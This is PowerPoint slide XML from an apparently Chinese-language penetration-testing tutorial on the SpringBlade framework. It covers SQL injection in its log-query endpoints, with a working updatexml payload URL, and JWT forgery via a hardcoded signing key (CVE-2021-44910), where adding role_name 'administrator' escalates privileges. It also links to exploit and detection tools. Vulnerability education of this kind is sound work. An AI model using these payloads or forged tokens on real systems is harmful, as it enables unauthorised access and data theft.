              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Dom</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>操作</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>html</a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="灯片编号占位符 7"/>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blade-system/dict/list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挂参之后的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>执行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结果。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="565150" y="2502535"/>
            <a:ext cx="9776460" cy="1852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blade-system/dict/list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4182745" cy="5013960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Brup</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>结果：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4485005" y="1409700"/>
            <a:ext cx="6913245" cy="4709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/blade-log/usual/list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/api/blade-log/usual/list：该接口是查询通用日志模块信息的，源码如下，利用方式和前面的方法</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>一样。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="918845" y="2218690"/>
            <a:ext cx="9248775" cy="401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/blade-log/usual/list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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="350520" y="3610610"/>
            <a:ext cx="11390630" cy="1320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/blade-log/usual/list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endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3355340" y="1445260"/>
            <a:ext cx="6777990" cy="4869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/blade-log/error/list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/api/blade-log/error/list：该接口查询的是错误日志信息，但是相对于其他接口来说该接口可以直接访问，不需要拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>！所以一般做渗透测试都是拿该接口做突破。源码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>利用过程和前面的都差不多，只是少了发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>步骤。</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p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1024890" y="2575560"/>
            <a:ext cx="9671050" cy="3938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/blade-log/error/list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执行的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="579120" y="2716530"/>
            <a:ext cx="9481820" cy="2281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spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>注入类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>/blade-log/error/list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可以通过浏览器直接发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>请求：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{IP}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>{port}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>/api/blade-log/error/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="144780" y="2315210"/>
            <a:ext cx="11576685" cy="2653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该漏洞已经有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>CVE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>编号：CVE-2021-44910</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>但是目前在很多企业的系统中仍然存在，接下来就通过源码的方式来详细，首要要知道</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的密钥在什么时候会起作用呢？就是在做授权和鉴权的时候，请看下图，用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>get</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>方式访问了一个简单需要授权的接口，结果返回了对应的提示信息，那么根据该提示信息在代码中全局搜索则会找到对应的逻辑</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>代码。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="699770" y="2551430"/>
            <a:ext cx="7944485" cy="3928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3872230" cy="5301615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>根据报错信息找到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>AuthFilter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类，该过滤器类为实现的根本方式鉴权与授权的最根本方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4309745" y="1109345"/>
            <a:ext cx="7117080" cy="5521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990600" y="2372285"/>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en-US" altLang="zh-CN" dirty="0"/>
              <a:t>JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28"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JavaScript</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"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其中的鉴权部分不需要详细关注，主要关注的就是授权部分，也就是下图中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法。</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其中JwtUtil.getToken是获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>，而真正的对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>进行解密的子啊</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JwtUtil.parseJWT()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="259715" y="1630680"/>
            <a:ext cx="6076950" cy="1514475"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="995045" y="3500120"/>
            <a:ext cx="7882255" cy="3202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其中有个关键的操作为JwtUtil.BASE64_SECURITY，也就是解密的密钥从图中可以看出该密钥硬编码到了第三方组件包，但是该包为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Blade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>核心包。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360420" y="2199640"/>
            <a:ext cx="8216265" cy="3136900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="图片 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2199640"/>
            <a:ext cx="3209925" cy="3267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5253990" y="4080510"/>
            <a:ext cx="5069840" cy="2550795"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107315" y="1200150"/>
            <a:ext cx="11900535" cy="1480185"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>通过伪造只能拿到普通用户权限，如何进行权限提升呢？我们根据查看源码就会发现接口上会有鉴权的标识，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>@PreAuth</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，通过源码的跟踪会发现最高权限为需要为administrator</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="231775" y="1876425"/>
            <a:ext cx="9385300" cy="2028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伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>类</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那么我们就可以利用该密钥进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的伪造了。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>提权关键步骤：在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中增加</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> “role_name”:”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>administrator</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>”</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1638935" y="1907540"/>
            <a:ext cx="7600950"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05</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="文本占位符 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:p>
            <a:r>
              <a:t>工具</a:t>
            </a:r>
            <a:r>
              <a:t>利用</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目的</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根据前面的漏洞复现以及源码分析可以知道每一类漏洞规律，那么可以使用以下工具</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>脚本来快速检测以及定位该使用了该架构的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>系统是否存在该类</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具一：检测是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://github.com/kkbo8005/poctools</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>工具二：检测是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>伪造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://github.com/W000i/CVE-2021-44910_SpringBlade</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工具一使用：</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4493895" cy="5100320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>目的：为了检测使用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring-Blade</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>框架的系统是否存在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>注入相关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>漏洞；</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>环境准备：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>JDK&gt;=8</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>项目</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址：https://github.com/kkbo8005/poctools</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>启动：下载好之后利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>java -jar </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的方式启动mitanpoc-0.2-jar-with-dependencies.jar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>包；</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4973320" y="1089025"/>
            <a:ext cx="6242050" cy="5351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工具一使用：</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文本框 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="173355" y="1214755"/>
            <a:ext cx="5518150" cy="5290820"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
